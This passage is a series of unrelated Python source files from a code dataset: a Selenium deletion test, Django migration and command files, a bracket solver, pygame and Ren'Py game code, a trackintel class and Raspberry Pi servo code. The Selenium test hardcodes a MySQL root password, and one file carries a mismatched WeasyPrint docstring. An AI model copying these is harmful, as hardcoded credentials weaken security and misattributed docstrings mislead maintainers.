\"/html/body/div/div[2]/div/div/div/div/div[3]/div[2]/table/tbody/tr[1]/td/div/div/i\"))\n for i in range(6):\n if i > 0:\n driver.find_element_by_xpath(\n \"/html/body/div/div[2]/div/div/div/div/div[3]/div[2]/table/tbody/tr[%s]/td/div/div/i\" % i).click()\n text = driver.find_element_by_xpath(\"/html/body/div[1]/div[2]/div/div/div/div\").text\n text3=re.findall(r\"\\d+\\.?\\d*\", text)\n text4=[]\n for i in text3:\n if len(i)>=5:\n text4.append(i)\n driver.find_element_by_xpath(\"/html/body/div[1]/div[1]/div[1]/div/button[3]/i\").click()\n time.sleep(1)\n self.driver.find_element_by_class_name(\"layui-layer-btn0\").click()\n time.sleep(0.5)\n fact_name = driver.find_element_by_class_name(\"layui-layer-content\").text\n print(fact_name)\n expect_name = \"删除成功\"\n self.assertEqual(fact_name, expect_name)\n\n Mysql.dbconfig = {\n 'host': '192.168.2.87',\n 'port': 3306,\n 'db': 'rg_web3_1',\n 'user': 'root',\n 'passwd': '123456',\n 'charset': 'utf8'\n }\n db = Mysql(Mysql.dbconfig)\n fact = db.select(table=\"t_setcode\", colume='set_code',\n condition='set_code=\"%s\" or set_code=\"%s\" or set_code=\"%s\" or set_code=\"%s\" or set_code=\"%s\"' % (\n text4[0], text4[1], text4[2], text4[3], text4[4]))\n if fact:\n print(\"areacode:\", text4[:5], \"delete failed\")\n else:\n print(\"areacode:\", text4[:5], \"delete succeeded\")\n db.close()\n\n# import CINTEL_FZweb3_1_1.HTMLTestRunner.HTMLTestReportEN as HTMLTestRunner\n# if __name__ == 'set_code_add':\n# reporter_dir = r's.html'\n# re_open = open(reporter_dir, 'wb')\n# suite = unittest.TestLoader().loadTestsFromTestCase(Set_code)\n# runner = HTMLTestRunner.HTMLTestRunner(\n# stream=re_open,\n# title=\"FZweb3.1.2 site code add feature\",\n# description='Test report',\n# )\n# runner.run(suite)","sub_path":"case/basic_data_case/set_code_del.py","file_name":"set_code_del.py","file_ext":"py","file_size_in_byte":5919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"185781770","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('members', '0047_pushover'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='membership',\n name='membership_type',\n field=models.CharField(choices=[('R', 'Regular'), ('W', 'Work-Trade'), ('S', 'Scholarship'), ('C', 'Complimentary'), ('G', 'Group'), ('F', 'Family'), ('K', 'Gift Card')], default='R', max_length=1, help_text='The type of membership.'),\n ),\n ]\n","sub_path":"members/migrations/0048_auto_20160503_1052.py","file_name":"0048_auto_20160503_1052.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"286689075","text":"#-*- encoding: utf-8 -*-\n\"\"\"A Balanced World\"\"\"\n\nimport sys\n\nwhile 1 :\n stack = []\n strings = sys.stdin.readline().rstrip()\n flag = 1\n\n for i in strings :\n if i == '(' or i == '[' :\n stack.append(i)\n elif i == ')' :\n if stack and stack[-1] == '(' :\n stack.pop()\n else :\n flag = 0\n break\n elif i == ']' :\n if stack and stack[-1] == '[' :\n stack.pop()\n else :\n flag = 0\n break\n\n if strings == '.' 
:\n break\n\n if flag and not stack :\n print('yes')\n else :\n print('no')","sub_path":"BOJ/STACK/4949.py","file_name":"4949.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"596966565","text":"##Blitting\nimport pygame\nfrom logHelper import *\npygame.init()\ndef blit(displayScreen, vardict, Textures, Player, blitrect, objList):\n for obj in objList:\n displayScreen.blit(obj.img, obj.rect)\n \n containedByScreen = []\n for i in objList:\n if blitrect.colliderect(i.rect):\n containedByScreen.append(i)\n displayScreen.blit(Player.player,(320,240))\n pygame.display.update(containedByScreen)\n \n##Events\ndef eventhandler(player, textures, gamevariables, event, keyinput, gameScreen, resources, objList): #Handle events\n returntext = ''\n ##Player movement\n \n if keyinput[pygame.K_ESCAPE]: #If the player presses escape, exit the game\n returntext = 'End'\n log(\"Going back to menu\")\n \n if event.type == pygame.QUIT:\n returntext = 'End'\n log(\"Going back to menu\")\n \n if keyinput[pygame.K_UP] and (keyinput[pygame.K_LEFT] or keyinput[pygame.K_RIGHT]): #If the player presses a key combo, move everything\n \n for obj in objList: \n obj.rect.move_ip(0, player.SPEED/2)\n\n \n if keyinput[pygame.K_LEFT]: #If the player presses left, move\n for obj in objList:\n obj.rect.move_ip(player.SPEED/2, 0)\n \n elif keyinput[pygame.K_RIGHT]: #If the player presses right, move\n for obj in objList:\n obj.rect.move_ip(-player.SPEED/2, 0)\n \n\n \n elif keyinput[pygame.K_UP]: #If the player presses up, move\n \n for obj in objList: \n obj.rect.move_ip(0, player.SPEED)\n \n if keyinput[pygame.K_DOWN] and (keyinput[pygame.K_LEFT] or keyinput[pygame.K_RIGHT]): #If the player presses a key combo, move\n \n for obj in objList:\n obj.rect.move_ip(0, -player.SPEED/2)\n \n if keyinput[pygame.K_LEFT]: #If the player presses left, move\n for obj in objList:\n obj.rect.move_ip(player.SPEED/2, 0)\n \n elif keyinput[pygame.K_RIGHT]: #If the player presses right, move\n \n for obj in objList:\n obj.rect.move_ip(-player.SPEED/2, 0)\n \n elif keyinput[pygame.K_DOWN]: #If the player presses down, move\n \n for obj in objList:\n obj.rect.move_ip(0, -player.SPEED)\n\n if keyinput[pygame.K_LEFT]: #If the player presses left, move\n for obj in objList:\n obj.rect.move_ip(player.SPEED, 0)\n\n if keyinput[pygame.K_RIGHT]: #If the player presses right, move\n for obj in objList:\n obj.rect.move_ip(-player.SPEED, 0)\n \n \n \n \n ##Other Keybindings\n \n if keyinput[pygame.K_RETURN]: #If the player presses the interact button\n for i in objList:\n if player.rect.colliderect(i.rect):\n player = i.interact(player)\n\n if keyinput[pygame.K_i]: #If the player presses the inventory button\n log('Inventory')\n printtext(str(player.inventory).replace('{','').replace('}','').replace(',',';').replace('\"','').replace(\"'\",''), gameScreen, gamevariables, textures, player, spritelist, rectlist, objList, resources )\n \n return returntext\n ","sub_path":"resources/libraries/mainloop.py","file_name":"mainloop.py","file_ext":"py","file_size_in_byte":3304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"389845511","text":"import pandas as pd\nimport geopandas as gpd\nimport trackintel as ti\nfrom trackintel.geogr.distances import calculate_distance_matrix\nfrom trackintel.io.file import write_positionfixes_csv\nfrom trackintel.io.postgis import write_positionfixes_postgis\nfrom 
trackintel.model.util import _copy_docstring\nfrom trackintel.preprocessing.positionfixes import generate_staypoints, generate_triplegs\nfrom trackintel.model.util import (\n get_speed_positionfixes,\n TrackintelBase,\n TrackintelGeoDataFrame,\n _register_trackintel_accessor,\n)\n\n_required_columns = [\"user_id\", \"tracked_at\"]\n\n\n@_register_trackintel_accessor(\"as_positionfixes\")\nclass Positionfixes(TrackintelBase, TrackintelGeoDataFrame, gpd.GeoDataFrame):\n \"\"\"A pandas accessor to treat (Geo)DataFrames as collections of `Positionfixes`.\n\n This will define certain methods and accessors, as well as make sure that the DataFrame\n adheres to some requirements.\n\n Requires at least the following columns:\n ['user_id', 'tracked_at']\n\n Requires valid point geometries; the 'index' of the GeoDataFrame will be treated as unique identifier\n of the `Positionfixes`.\n\n For several usecases, the following additional columns are required:\n ['elevation', 'accuracy' 'staypoint_id', 'tripleg_id']\n\n Notes\n -----\n In GPS based movement data analysis `Positionfixes` are the smallest unit of tracking and\n represent timestamped locations.\n\n 'tracked_at' is a timezone aware pandas datetime object.\n\n Examples\n --------\n >>> df.as_positionfixes.generate_staypoints()\n \"\"\"\n\n def __init__(self, *args, validate_geometry=True, **kwargs):\n # could be moved to super class\n # validate kwarg is necessary as the object is not fully initialised if we call it from _constructor\n # (geometry-link is missing). thus we need a way to stop validating too early.\n super().__init__(*args, **kwargs)\n self._validate(self, validate_geometry=validate_geometry)\n\n # create circular reference directly -> avoid second call of init via accessor\n @property\n def as_positionfixes(self):\n return self\n\n @staticmethod\n def _validate(obj, validate_geometry=True):\n assert obj.shape[0] > 0, f\"Geodataframe is empty with shape: {obj.shape}\"\n # check columns\n if any([c not in obj.columns for c in _required_columns]):\n raise AttributeError(\n \"To process a DataFrame as a collection of positionfixes, it must have the properties\"\n f\" {_required_columns}, but it has [{', '.join(obj.columns)}].\"\n )\n # check timestamp dtypes\n assert pd.api.types.is_datetime64tz_dtype(\n obj[\"tracked_at\"]\n ), f\"dtype of tracked_at is {obj['tracked_at'].dtype} but has to be datetime64 and timezone aware\"\n\n # check geometry\n if validate_geometry:\n assert (\n obj.geometry.is_valid.all()\n ), \"Not all geometries are valid. 
Try x[~ x.geometry.is_valid] where x is you GeoDataFrame\"\n\n if obj.geometry.iloc[0].geom_type != \"Point\":\n raise AttributeError(\"The geometry must be a Point (only first checked).\")\n\n @staticmethod\n def _check(obj, validate_geometry=True):\n \"\"\"Check does the same as _validate but returns bool instead of potentially raising an error.\"\"\"\n if any([c not in obj.columns for c in _required_columns]):\n return False\n if obj.shape[0] <= 0:\n return False\n if not pd.api.types.is_datetime64tz_dtype(obj[\"tracked_at\"]):\n return False\n if validate_geometry:\n return obj.geometry.is_valid.all() and obj.geometry.iloc[0].geom_type == \"Point\"\n return True\n\n @property\n def center(self):\n \"\"\"Return the center coordinate of this collection of positionfixes.\"\"\"\n lat = self.geometry.y\n lon = self.geometry.x\n return (float(lon.mean()), float(lat.mean()))\n\n @_copy_docstring(generate_staypoints)\n def generate_staypoints(self, *args, **kwargs):\n \"\"\"\n Generate staypoints from this collection of positionfixes.\n\n See :func:`trackintel.preprocessing.positionfixes.generate_staypoints`.\n \"\"\"\n return ti.preprocessing.positionfixes.generate_staypoints(self, *args, **kwargs)\n\n @_copy_docstring(generate_triplegs)\n def generate_triplegs(self, staypoints=None, *args, **kwargs):\n \"\"\"\n Generate triplegs from this collection of positionfixes.\n\n See :func:`trackintel.preprocessing.positionfixes.generate_triplegs`.\n \"\"\"\n return ti.preprocessing.positionfixes.generate_triplegs(self, staypoints, *args, **kwargs)\n\n @_copy_docstring(write_positionfixes_csv)\n def to_csv(self, filename, *args, **kwargs):\n \"\"\"\n Store this collection of trackpoints as a CSV file.\n\n See :func:`trackintel.io.file.write_positionfixes_csv`.\n \"\"\"\n ti.io.file.write_positionfixes_csv(self, filename, *args, **kwargs)\n\n @_copy_docstring(write_positionfixes_postgis)\n def to_postgis(\n self, name, con, schema=None, if_exists=\"fail\", index=True, index_label=None, chunksize=None, dtype=None\n ):\n \"\"\"\n Store this collection of positionfixes to PostGIS.\n\n See :func:`trackintel.io.postgis.write_positionfixes_postgis`.\n \"\"\"\n ti.io.postgis.write_positionfixes_postgis(\n self, name, con, schema, if_exists, index, index_label, chunksize, dtype\n )\n\n @_copy_docstring(calculate_distance_matrix)\n def calculate_distance_matrix(self, *args, **kwargs):\n \"\"\"\n Calculate pair-wise distance among positionfixes or to other positionfixes.\n\n See :func:`trackintel.geogr.distances.calculate_distance_matrix`.\n \"\"\"\n return ti.geogr.distances.calculate_distance_matrix(self, *args, **kwargs)\n\n @_copy_docstring(get_speed_positionfixes)\n def get_speed(self, *args, **kwargs):\n \"\"\"\n Compute speed per positionfix (in m/s)\n\n See :func:`trackintel.model.util.get_speed_positionfixes`.\n \"\"\"\n return ti.model.util.get_speed_positionfixes(self, *args, **kwargs)\n","sub_path":"trackintel/model/positionfixes.py","file_name":"positionfixes.py","file_ext":"py","file_size_in_byte":6207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"60272518","text":"\"\"\"\n WeasyPrint\n ==========\n\n WeasyPrint converts web documents to PDF.\n\n The public API is what is accessible from this \"root\" packages\n without importing sub-modules.\n\n :copyright: Copyright 2011-2020 Simon Sapin and contributors, see AUTHORS.\n :license: BSD, see LICENSE for details.\n\n\"\"\"\n\nfrom selenium import webdriver\nfrom selenium.webdriver import 
DesiredCapabilities\n\n\nclass FakeChrome(object):\n _browser = None\n\n def __new__(cls, executable_path=\"chromedriver\", **kwargs):\n if cls._browser is None:\n options = kwargs.pop('options', webdriver.ChromeOptions())\n if kwargs.pop('headless', False):\n options.add_argument('headless')\n options.add_argument(f\"--width={kwargs.pop('width', 2480)}\")\n options.add_argument(f\"--height={kwargs.pop('height', 3508)}\")\n options.add_argument('--allow-file-access-from-files')\n\n dc = kwargs.pop('desired_capabilities', DesiredCapabilities.CHROME)\n if 'goog:loggingPrefs' not in dc:\n dc['goog:loggingPrefs'] = {'browser': 'ALL'}\n cls._browser = webdriver.Chrome(\n executable_path,\n chrome_options=options,\n desired_capabilities=dc,\n **kwargs\n )\n return cls._browser\n\n\nclass FakeFirefox(object):\n _browser = None\n\n def __new__(cls, executable_path=\"geckodriver\", **kwargs):\n if cls._browser is None:\n options = kwargs.pop('options', webdriver.FirefoxOptions())\n if kwargs.pop('headless', False):\n options.add_argument('-headless')\n # options.add_argument(f\"--width={kwargs.pop('width', 2480)}\")\n # options.add_argument(f\"--height={kwargs.pop('height', 3508)}\")\n\n dc = kwargs.pop('desired_capabilities', DesiredCapabilities.FIREFOX)\n # if 'loggingPrefs' not in dc:\n # dc['loggingPrefs'] = {'browser': 'ALL'}\n cls._browser = webdriver.Firefox(\n executable_path,\n firefox_options=options,\n desired_capabilities=dc,\n **kwargs\n )\n return cls._browser\n","sub_path":"weasyprint/headless_browser.py","file_name":"headless_browser.py","file_ext":"py","file_size_in_byte":2214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"157443822","text":"import RPi.GPIO as GPIO\nimport time\nfrom gpiozero import Servo\n\ndef move_arm():\n claw = Servo(19,0)\n updown = 12\n elbow = Servo(13)\n\n rotate = 21\n GPIO.setmode(GPIO.BCM)\n\n GPIO.setup(rotate, GPIO.OUT)\n GPIO.setup(updown, GPIO.OUT)\n r = GPIO.PWM(rotate, 50)\n p = GPIO.PWM(updown, 50)\n\n #p.start(9.5)\n r.start(2.5)\n\n claw.mid()\n r.ChangeDutyCycle(2.5)\n print(\"Moved towards tubes\")\n time.sleep(2)\n print(\"Grabbing tube\")\n time.sleep(2)\n claw.max()\n time.sleep(5)\n\n print(\"Moving to user\")\n r.ChangeDutyCycle(12.5)\n time.sleep(2)\n print(\"Closing claw\")\n time.sleep(2)\n\n #GPIO.cleanup()\n #claw.stop()\n\ndef calibrate_updown():\n p.ChangeDutyCycle(7.5)\n\ndef calibrate_rotate():\n r.ChangeDutyCycle(2.5)\n\ndef calibrate():\n r.ChangeDutyCycle(7.5)\n claw.max()\n elbow.mid()\n p.ChangeDutyCycle(22.5)\n print(\"Calibrating - everything in mid position, claw closed\")\n time.sleep(2)\n\ndef grab_tube():\n claw.mid()\n r.ChangeDutyCycle(2.5)\n print(\"Moved towards tubes\")\n time.sleep(2)\n print(\"Grabbing tube\")\n time.sleep(2)\n claw.max()\n time.sleep(2)\n\ndef grab_swab():\n r.ChangeDutyCycle(3.5)\n claw.max()\n elbow.mid()\n print(\"Moved towards tubes\")\n time.sleep(2)\n print(\"Grabbing tube\")\n p.ChangeDutyCycle(22.5)\n claw.value = 0.65\n claw.mid()\n time.sleep(3)\n claw.max()\n time.sleep(1)\n print(\"Moving up\")\n #p.ChangeDutyCycle(27.5)\n time.sleep(2)\n\ndef release():\n print(\"Moving to user\")\n r.ChangeDutyCycle(12.5)\n time.sleep(2)\n print(\"Closing claw\")\n 
time.sleep(2)\n\n#calibrate()\n#time.sleep(5)\n#grab_tube()\n#claw.max()\n#claw.mid()\n#time.sleep(3)\n#claw.max()\n#release()\n#calibrate_updown()\n#time.sleep(2)\n#calibrate_rotate()\n#time.sleep(2)\n#p.stop()\n#r.stop()\n#GPIO.cleanup()\n#claw.stop()\n","sub_path":"arm.py","file_name":"arm.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"414302223","text":"from datetime import timedelta\nfrom django.core.management.base import BaseCommand, CommandError\nfrom liquid.plans.models import Seller\n\n\nclass Command(BaseCommand):\n help = 'Create default buyer role'\n\n def add_arguments(self, parser):\n parser.add_argument('name', type=str)\n parser.add_argument('restart_time', type=int)\n parser.add_argument('maximum_cards', type=int)\n parser.add_argument('discounts_enabled', type=bool)\n parser.add_argument('maximum_sale', type=float)\n parser.add_argument('selling_rate', type=float)\n parser.add_argument('fixed_rate', type=float)\n\n def handle(self, *args, **options):\n name = options['name']\n restart_time = timedelta(options['restart_time'])\n maximum_cards = options['maximum_cards']\n maximum_sale = options['maximum_sale']\n selling_rate = options['selling_rate']\n fixed_rate = options['fixed_rate']\n is_default = True\n\n try:\n seller = Seller.objects.create(\n name=name,\n restart_time=restart_time,\n maximum_cards=maximum_cards,\n maximum_sale=maximum_sale,\n selling_rate=selling_rate,\n fixed_rate=fixed_rate,\n is_default=is_default,\n )\n seller.save()\n except:\n raise CommandError('Error creating default seller role')\n\n self.stdout.write('Default seller created successfully.')\n","sub_path":"procodific-backend/liquid/plans/management/commands/create_default_seller.py","file_name":"create_default_seller.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"594757607","text":"import renpy.store as store\r\nimport renpy.exports as renpy\r\n\r\nimport logger\r\nimport StringIO\r\nimport pprint\r\n\r\n#Temp fix for missing modules\r\nfrom .. prepackaged.chasingLight import *\r\n\r\n\r\nclass battleScript(store.object):\r\n def __init__(self, myGameDir, importSettings, *args): #expected args would be a list of PC characters\r\n \r\n #take care of appropriate imports\r\n self.importSettings = importSettings\r\n \r\n# if self.importSettings[\"package\"] == \"chasingLight\":\r\n# from .. prepackaged.chasingLight import *\r\n# elif self.importSettings[\"package\"] == \"fantasy\":\r\n# from .. prepacked.fantasy import *\r\n# elif self.importSettings[\"package\"] == \"scifi\":\r\n# from .. prepackaged.scifi import *\r\n# elif self.importSettings[\"package\"] == \"none\":\r\n# #set board style\r\n# if self.importSettings[\"board\"] == \"hex\":\r\n# from .. board_style.hex import *\r\n# elif self.importedSettings[\"board\"] == \"square\":\r\n# from .. 
board_style.square import *\r\n \r\n self.gameDir = myGameDir\r\n self.battleName = \"Battle_Script_Base_Class\"\r\n\r\n self.battleScreenBG = \"white\"\r\n self.tutorial = False\r\n self.reply = None # this is used for dealing with user input during battles\r\n \r\n self.settings = {}\r\n self.settings[\"grid\"] = None\r\n self.settings[\"showGrid\"] = True\r\n self.settings[\"showBorder\"] = True\r\n self.settings[\"showHeader\"] = True\r\n self.settings[\"showFooter\"] = False #possibly deprecated\r\n self.settings[\"damage\"] = False #set to true to add damage images and remove conflicting graphics\r\n self.settings[\"showOrder\"] = True\r\n self.settings[\"showPaneEdge\"] = False\r\n self.settings[\"showPane\"] = False\r\n self.settings[\"showBack\"] = False\r\n self.settings[\"showControls\"] = True\r\n self.settings[\"controls\"] = {}\r\n self.settings[\"controls\"][\"showActionButton\"] = True\r\n self.settings[\"controls\"][\"showExamineButton\"] = True\r\n\r\n self.settings[\"showActionList\"] = False\r\n self.settings[\"unitSelect\"] = False\r\n self.settings[\"unitSelectForAttack\"] = False\r\n self.settings[\"unitSelectQue\"] = []\r\n \r\n self.settings[\"combatantList\"] = {}\r\n \r\n if args != None: #if we were passed a list of PC combatants\r\n self.settings[\"combatantList\"][\"pc\"] = []\r\n for x in xrange(len(args)):\r\n self.settings[\"combatantList\"][\"pc\"].append(args[x])\r\n\r\n\r\n else: #just in case we weren't passed a list of PC combatants\r\n self.settings[\"combatantList\"][\"pc\"] = []\r\n self.settings[\"TotNumOfPCs\"] = 0 \r\n for item in range(len(self.settings[\"combatantList\"][\"pc\"])):\r\n self.settings[\"TotNumOfPCs\"] += 1\r\n \r\n self.settings[\"combatantList\"][\"npc\"] = []\r\n self.settings[\"TotNumOfNPCs\"] = 0\r\n \r\n\r\n\r\n \r\n def createLogger(self):\r\n self.scriptLogger = logger.Logger(self.myGameDir + \"\\\\logs\\\\script_\" + self.battleName + \"_log.log\")\r\n \r\n def getCombatantList(self):\r\n return self.settings[\"combatantList\"]\r\n \r\n# def prettyPrintChars(self, appendage):\r\n# \"\"\"\r\n# Possibly not useful anymore... 
have to look into other uses for this besides allowing JUST the character lists to be printed\r\n# \"\"\"\r\n# outputString = self.battleName + \" Data: \\n\\n\"\r\n \r\n# outputString += appendage + \"PC Character List:\\n\"\r\n# outputString += appendage + \"Total Number of PCs:\" + str(self.settings[\"TotNumOfPCs\"]) + \"\\n\"\r\n# for item in range(len(self.settings[\"combatantList\"][\"pc\"])):\r\n# if (self.settings[\"combatantList\"][\"pc\"][item] == None):\r\n# outputString += appendage + \"PC\" + str(item) + \": No Unit!\\n\"\r\n# elif(self.settings[\"combatantList\"][\"pc\"][item] != None):\r\n# outputString += appendage + \"PC\" + str(item) + \":\\n\" + self.settings[\"combatantList\"][\"pc\"][item].prettyPrint(\"\\t\\t\")\r\n \r\n# outputString += \"\\n\" \r\n# outputString += appendage + \"NPC Character List:\\n\"\r\n# outputString += appendage + \"Total Number of NPCs:\" + str(self.settings[\"TotNumOfNPCs\"]) + \"\\n\"\r\n# for item in range(len(self.settings[\"combatantList\"][\"npc\"])):\r\n# if (self.settings[\"combatantList\"][\"npc\"][item] == None):\r\n# outputString += appendage + \"NPC\" + str(item) + \": No Unit!\\n\"\r\n# elif(self.settings[\"combatantList\"][\"npc\"][item] != None):\r\n# outputString += appendage + \"NPC\" + str(item) + \":\\n\" + self.settings[\"combatantList\"][\"npc\"][item].prettyPrint(\"\\t\\t\")\r\n \r\n# return outputString\r\n\r\n def blitScreen(self):\r\n self.scriptLogger.psp()\r\n self.scriptLogger.writeTo(\"BlitScreen\")\r\n reply = renpy.call_screen(\"chasingLightBattleScreen\", self.battleScreenBG, self.settings)\r\n self.scriptLogger.writeTo(\"BlitScreen: Success!\")\r\n \r\n return reply\r\n \r\n def blitConvo(self, who, what, characterList):\r\n \"\"\" who is the name of the say-er\r\n what is what the say-er will say\r\n character list is a dictionary of tuples containing the\r\n location of a character sprite to show and the x and y positions to\r\n show it at\r\n \"\"\"\r\n self.scriptLogger.psp()\r\n self.scriptLogger.writeTo(\"BlitConvo: who->\" + who + \" what->\\\"\" + what + \"\\\"\")\r\n #add a part to log the characters the call is supposed to display\r\n screen_cfg = (self.battleScreenBG, self.settings, self.importSettings[\"battleScreenName\"])\r\n renpy.call_screen(\"say2\", screen_cfg, who, what, characterList)\r\n self.scriptLogger.writeTo(\"BlitConvo: Success!\")\r\n self.scriptLogger.pump()\r\n\r\n def parseReply(self):\r\n self.scriptLogger.psp()\r\n self.scriptLogger.writeTo(\"Attempting to parse reply...\")\r\n if(type(self.reply) != tuple):\r\n self.scriptLogger.writeTo(\"Reply is not a tuple.\")\r\n \r\n if self.reply == \"showPane\":\r\n self.settings[\"showPane\"] = True\r\n self.settings[\"showPaneEdge\"] = False\r\n self.settings[\"showControls\"] = False\r\n self.settings[\"showBack\"] = True\r\n self.scriptLogger.writeTo(\"Reply successfully parsed as a request to show the side pane.\")\r\n \r\n if self.reply == \"showActions\":\r\n self.settings[\"showActionList\"] = True\r\n self.settings[\"showControls\"] = False\r\n self.settings[\"showBack\"] = True\r\n self.scriptLogger.writeTo(\"Reply successfully parsed as a request to show the actions list.\")\r\n if len(self.settings[\"unitSelectQue\"]) > 0: #this will deselect any units when we go to make an action\r\n self.scriptLogger.writeTo(\"To do this we must empty the selection queue.\")\r\n for x in xrange(len(self.settings[\"unitSelectQue\"])):\r\n self.scriptLogger.writeTo(\"Unit Deselected: \" + str(self.settings[\"unitSelectQue\"][x][0]) + 
str(self.settings[\"unitSelectQue\"][x][1]))\r\n self.settings[\"unitSelectQue\"].pop()\r\n self.settings[\"showPaneEdge\"] = False\r\n\r\n if self.reply == \"prepUnitSelect\":\r\n self.settings[\"unitSelect\"] = True\r\n self.settings[\"showControls\"] = False\r\n self.settings[\"showBack\"] = True\r\n self.scriptLogger.writeTo(\"Reply successfully parsed as a request to show unit select options.\")\r\n if len(self.settings[\"unitSelectQue\"]) > 0: #for now this will make it so that only one unit can be selected\r\n self.scriptLogger.writeTo(\"For now, to do this we must empty the selection queue.\")\r\n for x in xrange(len(self.settings[\"unitSelectQue\"])):\r\n self.scriptLogger.writeTo(\"Unit Deselected: \" + str(self.settings[\"unitSelectQue\"][x][0]) + str(self.settings[\"unitSelectQue\"][x][1]))\r\n self.settings[\"unitSelectQue\"].pop()\r\n self.settings[\"showPaneEdge\"] = False\r\n \r\n if self.reply == \"back\":\r\n if self.settings[\"showActionList\"]:\r\n self.settings[\"showActionList\"] = False\r\n self.settings[\"showControls\"] = True\r\n self.settings[\"showBack\"] = False\r\n self.scriptLogger.writeTo(\"Reply successfully parsed as a request to exit the actions list via the back button.\")\r\n if self.settings[\"unitSelect\"]:\r\n self.settings[\"unitSelect\"] = False\r\n self.settings[\"showControls\"] = True\r\n self.settings[\"showBack\"] = False\r\n self.scriptLogger.writeTo(\"Reply successfully parsed as a request to exit unit select via the back button.\")\r\n \r\n if self.settings[\"showBack\"]:\r\n if self.settings[\"showPane\"]:\r\n self.settings[\"showPane\"] = False\r\n self.settings[\"showBack\"] = False\r\n self.settings[\"showPaneEdge\"] = True\r\n self.settings[\"showControls\"] = True\r\n self.scriptLogger.writeTo(\"Reply successfully parsed as a request to exit the stats pane\")\r\n \r\n elif(type(self.reply) == tuple):\r\n self.scriptLogger.writeTo(\"Reply is a tuple.\")\r\n if len(self.reply) == 2:\r\n self.scriptLogger.writeTo(\"Reply has 2 elements.\")\r\n \r\n #else: uncomment once some ifs are added\r\n self.scriptLogger.writeTo(\"Failed to parse: \" + str(self.reply) + \"!\")\r\n elif len(self.reply) == 3:\r\n self.scriptLogger.writeTo(\"Reply has 3 elements.\")\r\n if self.reply[0] == \"selectedUnit\":\r\n #todo: figure out how to select by row/column, passing a list of units in that area\r\n #todo:write code to handle the selected unit better\r\n self.settings[\"unitSelectQue\"].append((self.reply[1], self.reply[2]))\r\n self.scriptLogger.writeTo(\"Reply successfully parsed as a unitSelect. 
Added \" + str(self.reply[1]) + str(self.reply[2]) + \" to selection queue.\")\r\n if not self.settings[\"unitSelectForAttack\"] and len(self.settings[\"unitSelectQue\"]) < 2:\r\n self.settings[\"unitSelect\"] = False\r\n self.settings[\"showControls\"] = True\r\n self.settings[\"showPaneEdge\"] = True\r\n self.scriptLogger.writeTo(\"Revealed the info pane edge button so that if the user wants they can view this unit's stats.\")\r\n \r\n\r\n else:\r\n self.settings[\"unitSelect\"] = False\r\n self.settings[\"showControls\"] = True\r\n self.settings[\"showBack\"] = False\r\n self.scriptLogger.writeTo(\"Unfortunately, we don't know what to do with this info yet!!!\")\r\n else: \r\n self.scriptLogger.writeTo(\"Failed to parse: \" + str(self.reply) + \"!\")\r\n\r\n \r\n self.scriptLogger.pump()\r\n \r\n def generateString(self):\r\n output = StringIO.StringIO()\r\n pp = pprint.PrettyPrinter(indent=4, stream=output)\r\n output.write(\"Settings dict:\\n\\n\")\r\n pp.pprint(self.settings)\r\n return output.getvalue()\r\n\r\n\r\n\r\n\r\n def buildGrid(self, gridX, gridY):\r\n self.settings[\"grid\"] = []\r\n for x in xrange(gridX):\r\n self.settings[\"grid\"].append([])\r\n for y in xrange(gridY):\r\n self.settings[\"grid\"][x].append(\"x\") #fill row x with placeholder cells, not the outer grid list\r\n \r\n def populateGrid(self, objects):\r\n pass\r\n #a method meant for populating the grid with characters and possibly objects\r\n #the objects parameter is a dict of objects, whose keys are used as ID tags for \r\n #referencing objects on the map. walls are prefixed by wall, terrain by terr, characters by char, \r\n #objectives by obj, items by item, cover by cov.\r\n \r\n\r\n#################################################################\r\n#################################################################\r\nclass firstBattle(battleScript):\r\n \r\n\r\n def __init__(self, myGameDir, importSettings, *args):\r\n self.myGameDir = myGameDir\r\n battleScript.__init__(self, self.myGameDir, importSettings, args)\r\n self.battleName = \"firstBattle\"\r\n self.chapterUnits()\r\n self.createLogger()\r\n #custom overrides for instantiation go below here\r\n \r\n\r\n\r\n def script(self):\r\n \"\"\"\r\n During battles, the script uses blitConvo to show say statements and character sprites over the top of the \r\n battleScreen. \r\n To allow the player to control the units, blitScreen is used to send the screen with the list of available options having\r\n been defined in the setting argument passed to renpy.call_screen. Both functions (blitScreen and this instance of renpy.call) will\r\n send back a response, likely in the form of a tuple. This tuple should then be parsed out to appropriately validate and handle the user's input.\r\n syntax\r\n ( action, effecting, listOfEffected)\r\n ( melee, team1-unit1, list[])\r\n ( ranged, team2unit-3, team1-unit2)\r\n \r\n e.g. 
Unit 1's turn; unit 1 wants to attack unit 3; \r\n\r\n\r\n \r\n \"\"\"\r\n \r\n self.scriptLogger.writeTo(\"Starting script execution...\")\r\n self.scriptLogger.dsplat()\r\n self.scriptLogger.pump()\r\n \r\n while True:\r\n\r\n self.blitConvo(\"Test\", \"TESTING\", None)\r\n self.reply = self.blitScreen()\r\n self.scriptLogger.writeTo(\"Blitscreen reply \" + str(self.reply))\r\n self.scriptLogger.pump()\r\n \r\n \r\n self.parseReply()\r\n \r\n \r\n \r\n\r\n \r\n \r\n self.scriptLogger.psp()\r\n self.scriptLogger.writeTo(\"Finished executing script, returning control to battle server\")\r\n\r\n \r\n def uniqueToString(self):\r\n pass\r\n \"\"\"\r\n #todo:write overloaded toString method, calling the super version first -> in error, I made \r\n dumpToLog. It will work fine as a temp fix for now, but eventually once we start getting more\r\n unique instance variables, we'll want to re-do the dumpToLog, probably by just copy-pasting and adding\r\n as needed, then tailoring this (called 